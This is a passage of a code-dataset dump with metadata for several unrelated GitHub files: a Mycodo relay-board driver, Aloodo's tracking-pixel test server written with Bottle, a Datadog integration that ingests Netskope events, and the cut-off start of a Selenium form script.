255:\n raise ValueError('Invalid relay value!')\n if value < 0:\n raise ValueError('Invalid relay value!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n oldVal = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n value = self.relayToIO(value)\n try:\n self.bus.write_byte_data(hwAdd, self.RELAY8_OUTPORT_REG_ADD, value)\n except Exception as e:\n self.bus.close()\n raise ValueError('Fail to write relay state value!')\n self.bus.close()\n\n def get(self, stack, relay):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n if relay < 1:\n raise ValueError('Invalid relay number!')\n if relay > 8:\n raise ValueError('Invalid relay number!')\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n\n val = self.IOToRelay(val)\n val = val & (1 << (relay - 1))\n self.bus.close()\n if val == 0:\n return 0\n else:\n return 1\n\n def get_all(self, stack):\n if stack < 0 or stack > 7:\n raise ValueError('Invalid stack level!')\n stack = 0x07 ^ stack\n\n hwAdd = self.DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n hwAdd = self.ALTERNATE_DEVICE_ADDRESS + stack\n try:\n val = self.check(self.bus, hwAdd)\n except Exception as e:\n self.bus.close()\n raise ValueError('8-relay card not detected!')\n\n val = self.IOToRelay(val)\n self.bus.close()\n return val\n", "repo_name": "kizniche/Mycodo", "sub_path": "mycodo/outputs/on_off_sequent_8_relay_hat.py", "file_name": "on_off_sequent_8_relay_hat.py", "file_ext": "py", "file_size_in_byte": 13742, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2708, "dataset": "github-code", "pt": "61", "api": [{"api_name": "collections.OrderedDict", "line_number": 17, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 18, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 33, "usage_type": "call"}, {"api_name": "mycodo.config_translations.TRANSLATIONS", "line_number": 88, "usage_type": "name"}, {"api_name": "mycodo.config_translations.TRANSLATIONS", "line_number": 89, "usage_type": "name"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 99, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 110, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 121, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 128, "usage_type": "call"}, {"api_name": "flask_babel.lazy_gettext", "line_number": 136, "usage_type": "call"}, {"api_name": "mycodo.outputs.base_output.AbstractOutput", "line_number": 143, "usage_type": "name"}, {"api_name": "mycodo.utils.database.db_retrieve_table_daemon", "line_number": 155, "usage_type": "call"}, {"api_name": "mycodo.databases.models.OutputChannel", "line_number": 156, "usage_type": "argument"}, {"api_name": "mycodo.databases.models.OutputChannel.output_id", "line_number": 156, "usage_type": "attribute"}]} +{"seq_id": "36969365675", "text": "#!/usr/bin/env python3\n\nfrom datetime import datetime, timedelta\nfrom email.utils import formatdate\nfrom time import mktime\nimport os.path\nfrom urllib3.util import parse_url\n\nfrom bottle import error, redirect, request, response, route, run, template\n\ndir = os.path.dirname(os.path.realpath(__file__))\nfilename = os.path.join(dir, 'dot_clear.png')\nwith open(filename, 'rb') as px:\n buf = px.read()\n\ndef format_headers(h):\n return '\\n'.join(['%s: %s' % (k, v) for (k, v) in h.items()])\n\n@error(404)\n@route('/')\n@route('//')\n@route('/')\ndef pixel(path_domain=\"\"):\n seen = {}\n sites = request.cookies.site\n sites = sites.replace('\"', '')\n for c in sites.split(' '):\n if '.' in c:\n seen[c] = True\n\n ref_domain = parse_url(request.get_header('Referer')).host\n req_domain = parse_url(request.url).host\n\n if ref_domain and ref_domain != req_domain:\n seen[ref_domain] = True\n\n try:\n del(seen['ad.aloodo.com'])\n except KeyError:\n pass\n\n cdata = ' '.join(seen.keys())\n if cdata:\n response.set_header('Set-Cookie',\n 'site=\"%s\"; Max-Age=31536000; Path=/' % cdata)\n\n response.status=200\n response.set_header('Tk', 'D')\n \n accept = request.get_header('Accept')\n if not \"image\" in accept and \"text/html\" in accept:\n response.set_header('Content-Type', 'text/html')\n return template('info',\n req_headers=format_headers(request.headers),\n res_headers=format_headers(response.headers),\n req_url=request.url)\n else:\n response.set_header('Content-Type', 'image/png')\n if len(seen) >= 3 or path_domain == ref_domain:\n expdt = datetime.now() + timedelta(days=7)\n exp = mktime(expdt.timetuple())\n response.set_header('Expires', formatdate(\n timeval=exp, localtime=False, usegmt=True))\n return buf\n\nif __name__ == '__main__':\n run(host='localhost', port=8000, reloader=True)\n\n", "repo_name": "Aloodo/ad.aloodo.com", "sub_path": "pixel/pixel.py", "file_name": "pixel.py", "file_ext": "py", "file_size_in_byte": 2010, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 18, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.path.dirname", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 11, "usage_type": "name"}, {"api_name": "os.path.path.realpath", "line_number": 11, "usage_type": "call"}, {"api_name": "os.path.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 12, "usage_type": "name"}, {"api_name": "bottle.request.cookies", "line_number": 25, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 25, "usage_type": "name"}, {"api_name": "urllib3.util.parse_url", "line_number": 31, "usage_type": "call"}, {"api_name": "bottle.request.get_header", "line_number": 31, "usage_type": "call"}, {"api_name": "bottle.request", "line_number": 31, "usage_type": "name"}, {"api_name": "urllib3.util.parse_url", "line_number": 32, "usage_type": "call"}, {"api_name": "bottle.request.url", "line_number": 32, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 32, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 44, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 44, "usage_type": "name"}, {"api_name": "bottle.response.status", "line_number": 47, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 47, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 48, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 48, "usage_type": "name"}, {"api_name": "bottle.request.get_header", "line_number": 50, "usage_type": "call"}, {"api_name": "bottle.request", "line_number": 50, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 52, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 52, "usage_type": "name"}, {"api_name": "bottle.template", "line_number": 53, "usage_type": "call"}, {"api_name": "bottle.request.headers", "line_number": 54, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 54, "usage_type": "name"}, {"api_name": "bottle.response.headers", "line_number": 55, "usage_type": "attribute"}, {"api_name": "bottle.response", "line_number": 55, "usage_type": "name"}, {"api_name": "bottle.request.url", "line_number": 56, "usage_type": "attribute"}, {"api_name": "bottle.request", "line_number": 56, "usage_type": "name"}, {"api_name": "bottle.response.set_header", "line_number": 58, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 58, "usage_type": "name"}, {"api_name": "datetime.datetime.now", "line_number": 60, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 60, "usage_type": "name"}, {"api_name": "datetime.timedelta", "line_number": 60, "usage_type": "call"}, {"api_name": "time.mktime", "line_number": 61, "usage_type": "call"}, {"api_name": "bottle.response.set_header", "line_number": 62, "usage_type": "call"}, {"api_name": "bottle.response", "line_number": 62, "usage_type": "name"}, {"api_name": "email.utils.formatdate", "line_number": 62, "usage_type": "call"}, {"api_name": "bottle.error", "line_number": 19, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 20, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 21, "usage_type": "call"}, {"api_name": "bottle.route", "line_number": 22, "usage_type": "call"}, {"api_name": "bottle.run", "line_number": 67, "usage_type": "call"}]} +{"seq_id": "29848002182", "text": "import re\nimport time\nfrom typing import Tuple\n\nimport datadog_agent\nimport requests\n\nfrom datadog_checks.base import AgentCheck\nfrom datadog_checks.base.errors import ConfigTypeError, ConfigurationError, ConfigValueError\n\nfrom . import cds_netskope_constants as constants\nfrom . import cds_netskope_utils as utils\nfrom .cds_netskope_api_client import NetskopeClient\nfrom .cds_netskope_datadog_client import DatadogClient, InvalidKeyError\nfrom .cds_netskope_errors import BillingSubmitError\nfrom .cds_netskope_events import EVENTS_CONFIG\n\n\ndef handle_errors(func):\n def handler(self, *args, **kwargs):\n try:\n return func(self, *args, **kwargs)\n except Exception:\n raise\n finally:\n self.dd_client.close()\n\n return handler\n\n\nclass CrestDataSystemsNetskopeCheck(AgentCheck):\n # This will be the prefix of every metric and service check the integration sends\n __NAMESPACE__ = \"cds.netskope\"\n\n def __init__(self, name, init_config, instances):\n super(CrestDataSystemsNetskopeCheck, self).__init__(name, init_config, instances)\n\n # Set log index to all for searching checkpoint logs from Datadog platform\n self.log_index = \"*\"\n\n # Read and set api_key and app_key for datadog API authentication\n self._api_key = datadog_agent.get_config(\"api_key\")\n self._app_key = datadog_agent.get_config(\"app_key\")\n\n self._site = datadog_agent.get_config(\"site\") or constants.DEFAULT_SITE\n\n # Use self.instance to read the check configuration\n self.host = self.instance.get(\"host\")\n self.v2_api_token = self.instance.get(\"v2_api_token\")\n self.min_collection_interval = self.instance.get(\"min_collection_interval\")\n self.events = self.instance.get(\"events\", constants.DEFAULT_EVENTS)\n self.collect_alerts = self.instance.get(\"collect_alerts\")\n self.ingest_metrics = self.instance.get(\"ingest_metrics\")\n\n # Initialize Datadog API client\n self.initialize_dd_client()\n\n @handle_errors\n def check(self, _):\n # Validate user configurations\n try:\n self.validate_configurations()\n msg = \"All the provided configurations in conf.yaml are valid.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={msg}\") # noqa: G004\n\n # Using checks and events, show that validations are successful.\n self.ingest_service_check_and_event(\n status=0,\n tags=constants.CONF_VAL_TAG,\n message=msg,\n title=constants.CONF_VAL_TITLE,\n source_type=constants.CONF_VAL_SOURCE_TYPE,\n )\n except Exception:\n err_message = (\n \"Error occurred while validating the provided configurations in conf.yaml.\"\n \" Please check logs for more details.\"\n )\n # Using checks and events, show that validations are not successful.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.CONF_VAL_TAG,\n message=err_message,\n title=constants.CONF_VAL_TITLE,\n source_type=constants.CONF_VAL_SOURCE_TYPE,\n )\n raise\n\n # Initialize Netskope API client for data collection\n self.initialize_client()\n\n # Authenticate Netskope API using V2 token\n try:\n self.authentication()\n msg = \"Authentication with Netskope is successful.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={msg}\") # noqa: G004\n\n # Using checks and events, show that authentication is successful.\n self.ingest_service_check_and_event(\n status=0,\n tags=constants.AUTH_TAG,\n message=msg,\n title=constants.AUTH_TITLE,\n source_type=constants.AUTH_SOURCE_TYPE,\n )\n except Exception:\n err_message = (\n \"Error occurred while authenticating the Netskope credentials. Please check logs for more details.\"\n )\n # Using checks and events, show that authentication is not successful.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.AUTH_TAG,\n message=err_message,\n title=constants.AUTH_TITLE,\n source_type=constants.AUTH_SOURCE_TYPE,\n )\n raise\n\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE=Start of the data collection.\") # noqa: G004\n start_time = time.time()\n\n # Netskope event data collection and Datadog ingestion\n for event_conf in EVENTS_CONFIG:\n event_type = event_conf.get(\"type\")\n\n # Check if event type is configured in configuration\n if (event_type != \"alert\" and event_type not in self.events) or (\n event_type == \"alert\" and not self.collect_alerts\n ):\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Skipping data collection for\" # noqa: G004\n f\" '{event_type}' event, since it's not specified in the configuration.\"\n )\n continue\n\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Collecting data for '{event_type}' event.\" # noqa: G004\n )\n\n checkpoint = self.dd_client.get_checkpoint(event_type)\n index, from_timestamp = self.parse_checkpoint(event_type, checkpoint)\n\n event_data = self.client.fetch_events_data(event_type, index, from_timestamp=from_timestamp)\n event_collected = False\n\n try:\n for events in event_data:\n event_collected = True\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Fetched {len(events)} events of\" # noqa: G004\n f\" '{event_type}' event.\"\n )\n\n if not events:\n continue\n\n # Submit billing metrics with events count\n self.submit_billing_metrics(len(events))\n\n for panel_name, panel_conf in event_conf.get(\"dashboard_panels\", {}).items():\n if panel_conf.get(\"type\") not in [\"metric\", \"log\"]:\n self.log.error(\n f\"Netskope | HOST={self.host} | MESSAGE=Invalid data type provided\" # noqa: G004\n f\" for '{panel_name}' panel, hence skipping data collection of this panel. Allowed\"\n f\" data types are metric and log but found: {panel_conf.get('type')}\"\n )\n continue\n\n try:\n self.ingest_dashboard_data(events, panel_name, panel_conf)\n except Exception:\n err_msg = (\n f\"Netskope | HOST={self.host} | MESSAGE=Error occurred while ingesting\" # noqa: G004\n f\" {panel_conf['type']}s data of '{panel_name}' panel, hence skipping\"\n f\" {panel_conf['type']}s ingestion of this panel.\"\n )\n self.log.exception(err_msg)\n except BillingSubmitError:\n err_message = \"Error occurred while submitting billing logs/metrics, hence stopping the execution...\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise\n except InvalidKeyError:\n self.log.error(\n f\"Netskope | HOST={self.host} | MESSAGE=Datadog API access forbidden error occurred\" # noqa: G004\n f\" while collecting/ingesting data of '{event_type}' event, hence skipping further data\"\n \" collection and ingestion for all the events.\"\n )\n raise\n except Exception:\n self.log.exception(\n f\"Netskope | HOST={self.host} | MESSAGE=Error occurred while collecting/ingesting\" # noqa: G004\n f\" data of '{event_type}' event, hence skipping further data collection and ingestion for\"\n \" this event.\"\n )\n\n if not event_collected:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=No data found of '{event_type}' event,\" # noqa: G004\n \" hence no data will be ingested.\"\n )\n else:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE='{event_type}' event data ingestion is\" # noqa: G004\n \" completed.\"\n )\n\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Submitting checkpoint log for '{event_type}'\" # noqa: G004\n \" event.\"\n )\n self.dd_client.save_checkpoint(event_type, {\"index\": index})\n\n elapsed_time = time.time() - start_time\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=End of the data collection.\" # noqa: G004\n f\" Time taken: {elapsed_time:.3f} seconds\"\n )\n\n def ingest_dashboard_data(self, event_data, panel_name, panel_conf):\n \"\"\"Ingests event data to datadog platform in form of metrics and logs.\"\"\"\n if panel_conf.get(\"type\") == \"metric\" and self.ingest_metrics:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Ingesting metrics for '{panel_name}' panel.\" # noqa: G004\n )\n metrics_list = utils.generate_metrics(\n event_data,\n panel_name,\n panel_conf[\"event_fields\"],\n panel_conf[\"alias_fields\"],\n panel_conf[\"tag_fields\"],\n panel_conf[\"metric_fields\"],\n panel_conf.get(\"is_count\", False),\n panel_conf.get(\"timestamp_field\"),\n )\n metrics_payload = []\n for metric in metrics_list:\n metric_field = metric[0].split(\".\")[-1]\n tags = (\n metric[2]\n + self.instance.get(\"tags\", [])\n + panel_conf.get(\"custom_metric_tags\", {}).get(metric_field, (None, []))[1]\n + [f\"{constants.HOST_TAG_NAME}:{self.host}\"]\n )\n metric_name_prefix = \".\".join(metric[0].split(\".\")[:-1])\n metric_name = \".\".join(\n [\n metric_name_prefix,\n panel_conf.get(\"custom_metric_tags\", {}).get(metric_field, [None])[0] or metric_field,\n ]\n )\n if not utils.is_float(metric[1]):\n metric[1] = 0\n metrics_payload.append((metric_name, metric[1], tags, metric[3]))\n self.dd_client.submit_metrics(metrics_payload)\n\n elif panel_conf.get(\"type\") == \"log\":\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Ingesting logs for '{panel_name}' panel.\" # noqa: G004\n )\n self.dd_client.submit_logs(\n panel_name,\n utils.generate_logs(\n event_data,\n panel_conf[\"event_fields\"],\n panel_conf[\"alias_fields\"],\n panel_conf.get(\"conditions\"),\n ),\n panel_conf.get(\"timestamp_field\"),\n fn_to_evaluate_event=lambda event: (\n utils.field_parser(\n event,\n panel_conf[\"log_fields\"], # noqa: B023\n ),\n utils.tag_generator(event, panel_conf[\"tag_fields\"]), # noqa: B023\n ),\n )\n\n def validate_configurations(self):\n \"\"\"Validates the configurations provided by the user.\"\"\"\n\n # Validating host field\n if not re.match(r\"^((?!-)[A-Za-z0-9-\\.]*)$\", self.host):\n err_message = (\n \"'Host' is not valid. Please provide a proper hostname without protocol, \"\n \"any special characters, and slashes. Permitted characters are (A-Z), (a-z), (0-9), \"\n \"hyphen(-) and period(.)\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n # Validate events field\n if self.events is None or self.events == []:\n no_events_message = (\n \"'events' field is provided but no value is found. No data will be collected for any endpoints.\"\n )\n self.events = []\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={no_events_message}\") # noqa: G004\n\n for event in self.events:\n if event not in constants.DEFAULT_EVENTS:\n err_message = (\n f\"'{event}' value for 'events' field is not valid. \"\n \"Permitted values are 'infrastructure', 'network', 'connection', 'audit', 'application', \"\n \"and 'incident'.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n events_conf_msg = f\"The list of configured events is {self.events}.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={events_conf_msg}\") # noqa: G004\n\n # Validate collect_alerts\n if not isinstance(self.collect_alerts, bool):\n err_message = \"'collect_alerts' field is not valid. Permitted values are true and false.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n alerts_conf_msg = \"Alerts data collection is marked true.\"\n if not self.collect_alerts:\n alerts_conf_msg = \"Alerts data collection is marked false.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={alerts_conf_msg}\") # noqa: G004\n\n # Validate ingest_metrics\n if not isinstance(self.ingest_metrics, bool):\n err_message = \"'ingest_metrics' field is not valid. Permitted values are true and false.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigTypeError(err_message)\n\n metrics_conf_msg = (\n \"Metrics data ingestion is marked true, hence metrics data will be ingested to Datadog platform.\"\n )\n if not self.ingest_metrics:\n metrics_conf_msg = \"Metrics data ingestion is marked false, hence metrics data ingestion will be skipped.\"\n self.log.info(f\"Netskope | HOST={self.host} | MESSAGE={metrics_conf_msg}\") # noqa: G004\n\n # validate min_collection_interval\n try:\n self.min_collection_interval = int(self.min_collection_interval)\n if self.min_collection_interval <= 0:\n raise ValueError\n except (ValueError, TypeError):\n if self.min_collection_interval is None:\n err_message = \"'min_collection_interval' field is missing.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n err_message = (\n \"'min_collection_interval' must be a positive integer value greater than 0,\"\n f\" but found {self.min_collection_interval}.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigValueError(err_message)\n\n def authentication(self):\n \"\"\"Validates the Netskope credentials.\"\"\"\n try:\n event_types = self.events.copy()\n if self.collect_alerts:\n event_types.append(\"alert\")\n forbidden_event_type = self.client.authenticate(event_types, constants.AUTH_INDEX)\n\n if forbidden_event_type:\n err_message = (\n f\"Insufficient API permission of following event's endpoints: {forbidden_event_type}.\"\n \" Verify the V2 token and its permission for mentioned events.\"\n )\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message)\n\n except requests.exceptions.SSLError as err:\n err_message = \"SSL verification failed.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message} Error: {err}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n except requests.exceptions.ConnectionError as err:\n err_message = \"Authentication failed for provided credentials. Please check the provided host.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message} Error: {err}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n except requests.exceptions.HTTPError as err:\n if err.response.status_code == 403:\n err_message = (\n \"Authentication failed for provided credentials.\"\n \" Please check the provided token and its permissions.\"\n )\n self.log.error(\n f\"Netskope | HOST={self.host} | STATUS_CODE={err.response.status_code} \" # noqa: G004\n f\"| MESSAGE={err_message} Error: {err}\"\n )\n raise ConfigurationError(err_message) from err\n else:\n err_message = (\n \"Error occurred while validating the Netskope credentials. Please check the provided credentials.\"\n )\n self.log.error(\n f\"Netskope | HOST={self.host} | STATUS_CODE={err.response.status_code} \" # noqa: G004\n f\"| MESSAGE={err_message} Error: {err}\"\n )\n raise ConfigurationError(err_message) from err\n\n except Exception as err:\n err_message = (\n \"Error occurred while validating the Netskope credentials. Please check the provided credentials.\"\n )\n self.log.exception(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n raise ConfigurationError(err_message) from err\n\n def initialize_dd_client(self):\n \"\"\"Validates API key and initializes datadog API client for submitting logs and metrics through API.\"\"\"\n\n if not self._api_key or not self._app_key:\n err_message = \"API Key is missing.\" if not self._api_key else \"App Key is missing.\"\n self.log.error(f\"Netskope | HOST={self.host} | MESSAGE={err_message}\") # noqa: G004\n\n # Using checks and events, show that Datadog API key or app key is missing.\n self.ingest_service_check_and_event(\n status=2,\n tags=constants.API_VAL_TAG,\n message=err_message,\n title=constants.API_VAL_TITLE,\n source_type=constants.API_VAL_SOURCE_TYPE,\n )\n raise ConfigurationError(err_message)\n\n api_key_auth = {\"apiKeyAuth\": self._api_key, \"appKeyAuth\": self._app_key}\n\n try:\n self.dd_client = DatadogClient(self._site, api_key_auth, self)\n self.dd_client.validate_keys()\n except Exception as ex:\n raise ConfigurationError(ex) from ex\n\n def initialize_client(self):\n \"\"\"Initializes Netskope client with v2 API token.\"\"\"\n\n self.client = NetskopeClient(self.host, self.v2_api_token, self.log)\n\n def ingest_service_check_and_event(self, **service_check_event_args):\n \"\"\"\n Ingest Service Check and Event for any particular milestone with success or error status.\n **service_check_event_args =\n - For check = [, , ]\n - For Event = [, , , , ]\n \"\"\"\n self.service_check(\n constants.NETSKOPE_CHECK_NAME,\n service_check_event_args.get(\"status\"),\n service_check_event_args.get(\"tags\"),\n self.host,\n service_check_event_args.get(\"message\"),\n )\n self.event(\n {\n \"host\": self.host,\n \"alert_type\": constants.STATUS_NUMBER_TO_VALUE[service_check_event_args.get(\"status\")],\n \"tags\": service_check_event_args.get(\"tags\"),\n \"msg_text\": service_check_event_args.get(\"message\"),\n \"msg_title\": service_check_event_args.get(\"title\"),\n \"source_type_name\": service_check_event_args.get(\"source_type\"),\n }\n )\n\n def get_netskope_index(self, event_name: str) -> str:\n \"\"\"Generates and returns netskope index with current timestamp as a unique identifier.\n\n :param event_name: netskope event name\n :type event_name: str\n\n :return: generated index string\n :rtype: str\n \"\"\"\n timestamp = int(time.time())\n return \".\".join([constants.NETSKOPE_INDEX_PREFIX, event_name, str(timestamp)])\n\n def submit_billing_metrics(self, count: int) -> None:\n \"\"\"Submits billing metrics with events count.\n\n :param count: event count\n :type count: int\n \"\"\"\n try:\n checkpoint = self.dd_client.get_checkpoint(\n constants.BILLING_CHECKPOINT, search_host=False, raise_error=True\n )\n event_count = 0\n tag_count = 0\n if checkpoint:\n event_count = checkpoint.get(\"event-count\")\n tag_count = checkpoint.get(\"tag-count\")\n\n event_count += count\n\n while event_count // constants.BILLING_PER_EVENTS >= tag_count:\n tag_count += 1\n\n billing_metrics_body = (\n constants.MARKETPLACE_BILLING_METRIC,\n event_count,\n [f\"event_tag:{time.time()}\", f\"event-count:{event_count}\", f\"tag-count:{tag_count}\"],\n )\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Submitting marketplace billing metric\" # noqa: G004\n \" with current timestamp.\"\n )\n self.dd_client.submit_metrics([billing_metrics_body], latest=True, include_prefix=False)\n\n self.dd_client.save_checkpoint(\n constants.BILLING_CHECKPOINT, {\"event-count\": event_count, \"tag-count\": tag_count}\n )\n except Exception as ex:\n raise BillingSubmitError from ex\n\n def parse_checkpoint(self, event_type: str, checkpoint: dict) -> Tuple[str, bool]:\n \"\"\"Parses checkpoint data and finds netskope index.\n\n :param event_type: netskope event type\n :type event_type: str\n :param checkpoint: checkpoint data\n :type checkpoint: dict\n\n :return: index and from_timestamp flag\n :rtype: (str, bool)\n \"\"\"\n index = None\n from_timestamp = True\n\n if not checkpoint:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=No checkpoint found of '{event_type}' event,\" # noqa: G004\n f\" hence data will be collected from default collection time(={constants.TIMESTAMP_OFFSET} seconds).\"\n )\n else:\n index = checkpoint.get(\"index\")\n checkpoint_timestamp = utils.get_epoch_timestamp(checkpoint.get(\"timestamp\"))\n if checkpoint_timestamp and int(time.time()) - checkpoint_timestamp > constants.TIMESTAMP_OFFSET:\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Found checkpoint for '{event_type}' event,\" # noqa: G004\n \" but checkpoint time is older than default collection time so data will be collected\"\n f\" from default collection time(={constants.TIMESTAMP_OFFSET} seconds). Checkpoint: {checkpoint}\"\n )\n else:\n from_timestamp = False\n self.log.info(\n f\"Netskope | HOST={self.host} | MESSAGE=Found checkpoint for '{event_type}' event,\" # noqa: G004\n f\" hence collecting the data from last checkpoint. Checkpoint: {checkpoint}\"\n )\n\n index = self.get_netskope_index(event_type) if not index else index\n\n return index, from_timestamp\n", "repo_name": "gjanco/mezmo-dd-marketplace", "sub_path": "crest_data_systems_netskope/datadog_checks/crest_data_systems_netskope/check.py", "file_name": "check.py", "file_ext": "py", "file_size_in_byte": 24905, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "datadog_checks.base.AgentCheck", "line_number": 31, "usage_type": "name"}, {"api_name": "datadog_agent.get_config", "line_number": 42, "usage_type": "call"}, {"api_name": "datadog_agent.get_config", "line_number": 43, "usage_type": "call"}, {"api_name": "datadog_agent.get_config", "line_number": 45, "usage_type": "call"}, {"api_name": "time.time", "line_number": 121, "usage_type": "call"}, {"api_name": "cds_netskope_events.EVENTS_CONFIG", "line_number": 124, "usage_type": "name"}, {"api_name": "cds_netskope_errors.BillingSubmitError", "line_number": 179, "usage_type": "name"}, {"api_name": "cds_netskope_datadog_client.InvalidKeyError", "line_number": 183, "usage_type": "name"}, {"api_name": "time.time", "line_number": 214, "usage_type": "call"}, {"api_name": "re.match", "line_number": 283, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 290, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 308, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 317, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigTypeError", "line_number": 328, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 346, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigValueError", "line_number": 353, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 369, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 371, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 374, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 376, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 379, "usage_type": "call"}, {"api_name": "requests.exceptions", "line_number": 381, "usage_type": "attribute"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 391, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 400, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 407, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 424, "usage_type": "call"}, {"api_name": "cds_netskope_datadog_client.DatadogClient", "line_number": 429, "usage_type": "call"}, {"api_name": "datadog_checks.base.errors.ConfigurationError", "line_number": 432, "usage_type": "call"}, {"api_name": "cds_netskope_api_client.NetskopeClient", "line_number": 437, "usage_type": "call"}, {"api_name": "time.time", "line_number": 473, "usage_type": "call"}, {"api_name": "time.time", "line_number": 500, "usage_type": "call"}, {"api_name": "cds_netskope_errors.BillingSubmitError", "line_number": 512, "usage_type": "name"}, {"api_name": "time.time", "line_number": 536, "usage_type": "call"}, {"api_name": "typing.Tuple", "line_number": 514, "usage_type": "name"}]} +{"seq_id": "5775541878", "text": "from selenium import webdriver\nimport time \nimport math\nfrom selenium.webdriver.common.by import By\nimport os\n\nlink = \"http://suninjuly.github.io/file_input.html\"\n\ntry:\n browser = webdriver.Chrome()\n browser.get(link)\n \n input1 = browser.find_element(By.CSS_SELECTOR, 'input[name=\"firstname\"][required=\"\"]')\n input1.send_keys(\"Ivan\")\n input2 = browser.find_element(By.CSS_SELECTOR, 